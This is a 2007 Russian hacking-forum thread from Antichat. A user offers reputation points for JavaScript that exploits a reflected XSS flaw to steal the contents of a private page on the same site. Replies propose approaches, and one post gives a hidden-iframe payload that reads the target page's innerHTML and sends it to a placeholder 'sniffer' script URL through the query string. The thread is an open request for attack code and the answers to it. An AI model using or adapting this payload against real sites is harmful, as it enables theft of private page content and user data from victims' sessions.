Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   (+50) Вопрос по Javascript (https://forum.antichat.xyz/showthread.php?t=40378)

c411k 19.05.2007 16:31

(+50) Вопрос по Javascript
 
Gh0s7 попропрорпросил запостить :)

Собственно сабж. Есть вопрос по жс.
<Gh0s7> Ситуация такая:
<Gh0s7> Есть саент, на нем пассив гет хсс, длина неорграничена.
<Gh0s7> На том же саенте есть мааленькая страничка. Она очень маленькая, в одну строку, примерно 12-16 символов, полностью без хтмл.
<Gh0s7> Нужно через имеющуюся хсс слить эту страницу куда-нибудь, например на сниффер.
<Gh0s7> На сколько я знаю, это реально.
<Gh0s7> Тем, кто даст код +50 в репу (после того, как вернусь из отпуска, в понедельник)

Abra 19.05.2007 16:40

через xss получить контент страницы? 0_о страница закрытая что ли? Типа для мемберов?
Думаю через XMLHttpRequest как-нить поколодовать можно. Отправить запрос на страницу, получить контент в качестве ответа, передать контент снифферу. Хотя хз.

Вариант 2:
Вставляем в уязвимую страницу фрейм с таргетом на закрытую страницу, и JS код который тырит контент фрейма (помоему innerHTML может из фрейма контент забрать?). ну и далее этот контент отправляем на снифак.

ЗЫ просто мысли в слух - надеюсь никто не против.

+toxa+ 19.05.2007 17:05

Код:

<script src=""></script>
мб так? имхо минимальный размер)

invlose 19.05.2007 17:25

+toxa+=)
опередил

NOmeR1 19.05.2007 17:32

А так не меньше?
Код HTML:

<frame src="">

invlose 19.05.2007 18:07

в случае фрейма должны быть одинаковые домены(тут тоже есть тонкость) фрейма и закрытой страницы


или нужно писать <frame src='javascript:......'> (не уверен что прокатит)

********
если я правильно понял про что вы ,
если нет-извините=)

V1k 19.05.2007 18:50

Код HTML:

<iframe id="i1" name="i1" style="display:none" src="http://that/we/wish/to.steal" onload="i1.onload='';i1.contentDocument.location='http://our/sniffer.script?data='+escape(i1.contentDocument.getElementsByTagName('html')[0].innerHTML)"></iframe>
Это будет работать, естественно, если не противоречит безопасности JavaScript, т.е. страница с xss и похищяемая должны иметь одинаковые протокол и домен.

V1k 19.05.2007 18:54

GreenBear, все таки
Цитата:

Сообщение от Gh0s7
На том же саенте есть мааленькая страничка.

или
Цитата:

Сообщение от GreenBear
код страницы, где ксс

?

blackybr 19.05.2007 19:04

Цитата:

Сообщение от V1k
GreenBear, все таки

или
?

<Gh0s7> 'Не код страницы где хсс, а код той небольшой страницы, где 14-16 символов'

V1k 19.05.2007 19:21

омг, ты в курсе что событие onload в iframe происходит после того, как полностью загрузилась страница, указанная в его src?


Время: 15:43